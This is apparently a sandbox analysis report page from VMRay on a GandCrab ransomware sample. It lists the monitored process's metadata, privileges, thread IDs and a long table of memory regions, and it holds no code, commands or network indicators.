GandCrab Ransomware | Sequential Behavior
Try VMRay Analyzer
Monitored Processes
Process Graph
Behavior Information - Sequential View
Process #1: bi35.exe
(Host: 2189, Network: 22)
+
Information Value
ID #1
File Name c:\users\ciihmnxmn6ps\desktop\bi35.exe
Command Line "C:\Users\CIiHmnxMn6Ps\Desktop\bi35.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:10:00
OS Process Information
+
Information Value
PID 0x478
Parent PID 0x728 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AD4
0x D14
0x 9D4
0x D64
0x D38
0x CF0
0x CE4
0x D88
0x 9C4
0x DB8
0x D80
0x D7C
0x BEC
0x D60
0x D5C
0x D34
0x D3C
0x 568
0x CEC
0x CD8
0x DC0
0x 250
0x 278
0x 9D8
0x D00
0x CF4
0x D40
0x CFC
0x CF8
0x D44
0x D4C
0x 818
0x F0
0x 210
0x 46C
0x E00
0x DF8
0x DF4
0x DAC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000210000 0x00210000 0x00210fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x00230000 0x002edfff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable, Executable True True False
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000003f0000 0x003f0000 0x003f3fff Pagefile Backed Memory Readable True False False
  • Region Actions
bi35.exe 0x00400000 0x00426fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000430000 0x00430000 0x00441fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000430000 0x00430000 0x0046ffff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00445fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable True True False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000440000 0x00440000 0x00440fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000470000 0x00470000 0x0052ffff Private Memory Readable, Writable True True False
private_0x0000000000470000 0x00470000 0x00473fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000480000 0x00480000 0x00485fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000480000 0x00480000 0x00480fff Private Memory Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000490000 0x00490000 0x00490fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000490000 0x00490000 0x0050ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000510000 0x00510000 0x00510fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000510000 0x00510000 0x00510fff Private Memory Readable, Writable, Executable True True False
private_0x0000000000510000 0x00510000 0x00510fff Private Memory Readable, Writable True True False
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable True True False
private_0x0000000000530000 0x00530000 0x0062ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000630000 0x00630000 0x007b7fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000007c0000 0x007c0000 0x00940fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000950000 0x00950000 0x0095ffff Private Memory Readable, Writable True True False
private_0x0000000000950000 0x00950000 0x00965fff Private Memory Readable, Writable True True False
private_0x00000000009a0000 0x009a0000 0x009a2fff Private Memory Readable, Writable, Executable True True False
private_0x00000000009a0000 0x009a0000 0x009a0fff Private Memory Readable, Writable, Executable True True False
private_0x00000000009b0000 0x009b0000 0x009bffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000009c0000 0x009c0000 0x01dbffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001dc0000 0x01dc0000 0x01f0ffff Private Memory Readable, Writable True True False
private_0x0000000001dc0000 0x01dc0000 0x01eeffff Private Memory Readable, Writable True True False
private_0x0000000001dc0000 0x01dc0000 0x01ebffff Private Memory Readable, Writable True True False
private_0x0000000001ec0000 0x01ec0000 0x01ec2fff Private Memory Readable, Writable, Executable True True False
private_0x0000000001ec0000 0x01ec0000 0x01ec0fff Private Memory Readable, Writable, Executable True True False
private_0x0000000001ec0000 0x01ec0000 0x01ec8fff Private Memory Readable, Writable, Executable True True False
private_0x0000000001ee0000 0x01ee0000 0x01eeffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001f00000 0x01f00000 0x01f0ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000001f10000 0x01f10000 0x01fc7fff Pagefile Backed Memory Readable True False False
  • Region Actions
sortdefault.nls 0x01fd0000 0x02306fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True True False
private_0x0000000002450000 0x02450000 0x0254ffff Private Memory Readable, Writable True True False
private_0x0000000002550000 0x02550000 0x0258ffff Private Memory Readable, Writable True True False
private_0x0000000002590000 0x02590000 0x0268ffff Private Memory Readable, Writable True True False
private_0x0000000002690000 0x02690000 0x026cffff Private Memory Readable, Writable True True False
private_0x00000000026d0000 0x026d0000 0x027cffff Private Memory Readable, Writable True True False
private_0x00000000026d0000 0x026d0000 0x026e7fff Private Memory Readable, Writable, Executable True True False
private_0x00000000026f0000 0x026f0000 0x026f1fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002700000 0x02700000 0x02700fff Private Memory Readable, Writable True True False
private_0x0000000002710000 0x02710000 0x02710fff Private Memory Readable, Writable True True False
private_0x0000000002710000 0x02710000 0x02713fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002720000 0x02720000 0x02722fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02732fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02731fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002730000 0x02730000 0x02730fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002740000 0x02740000 0x02740fff Private Memory Readable, Writable, Executable True True False
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True True False
private_0x0000000002810000 0x02810000 0x0290ffff Private Memory Readable, Writable True True False
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002860000 0x02860000 0x02860fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable, Executable True True False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable True True False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable True True False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable True True False
private_0x0000000002880000 0x02880000 0x02880fff Private Memory Readable, Writable True True False
private_0x0000000002880000 0x02880000 0x02880fff Private Memory Readable, Writable True True False
private_0x0000000002880000 0x02880000 0x02880fff Private Memory Readable, Writable True True False
private_0x0000000002890000 0x02890000 0x02890fff Private Memory Readable, Writable True True False
private_0x0000000002890000 0x02890000 0x02890fff Private Memory Readable, Writable True True False
private_0x0000000002890000 0x02890000 0x02890fff Private Memory Readable, Writable True True False
private_0x00000000028a0000 0x028a0000 0x029a0fff Private Memory Readable, Writable True True False
private_0x00000000028a0000 0x028a0000 0x029a0fff Private Memory Readable, Writable True True False
private_0x00000000028a0000 0x028a0000 0x029a0fff Private Memory Readable, Writable True True False
private_0x0000000002910000 0x02910000 0x0294ffff Private Memory Readable, Writable True True False
private_0x0000000002950000 0x02950000 0x02a4ffff Private Memory Readable, Writable True True False
private_0x00000000029b0000 0x029b0000 0x029b0fff Private Memory Readable, Writable True True False
private_0x00000000029b0000 0x029b0000 0x029bdfff Private Memory Readable, Writable True True False
private_0x00000000029c0000 0x029c0000 0x029c0fff Private Memory Readable, Writable True True False
private_0x00000000029c0000 0x029c0000 0x029cdfff Private Memory Readable, Writable True True False
private_0x0000000002a50000 0x02a50000 0x02a8ffff Private Memory Readable, Writable True True False
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory Readable, Writable True True False
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True True False
private_0x0000000002bd0000 0x02bd0000 0x02ccffff Private Memory Readable, Writable True True False
private_0x0000000002cd0000 0x02cd0000 0x02d0ffff Private Memory Readable, Writable True True False
private_0x0000000002d10000 0x02d10000 0x02e0ffff Private Memory Readable, Writable True True False
private_0x0000000002e10000 0x02e10000 0x02e4ffff Private Memory Readable, Writable True True False
private_0x0000000002e50000 0x02e50000 0x02f4ffff Private Memory Readable, Writable True True False
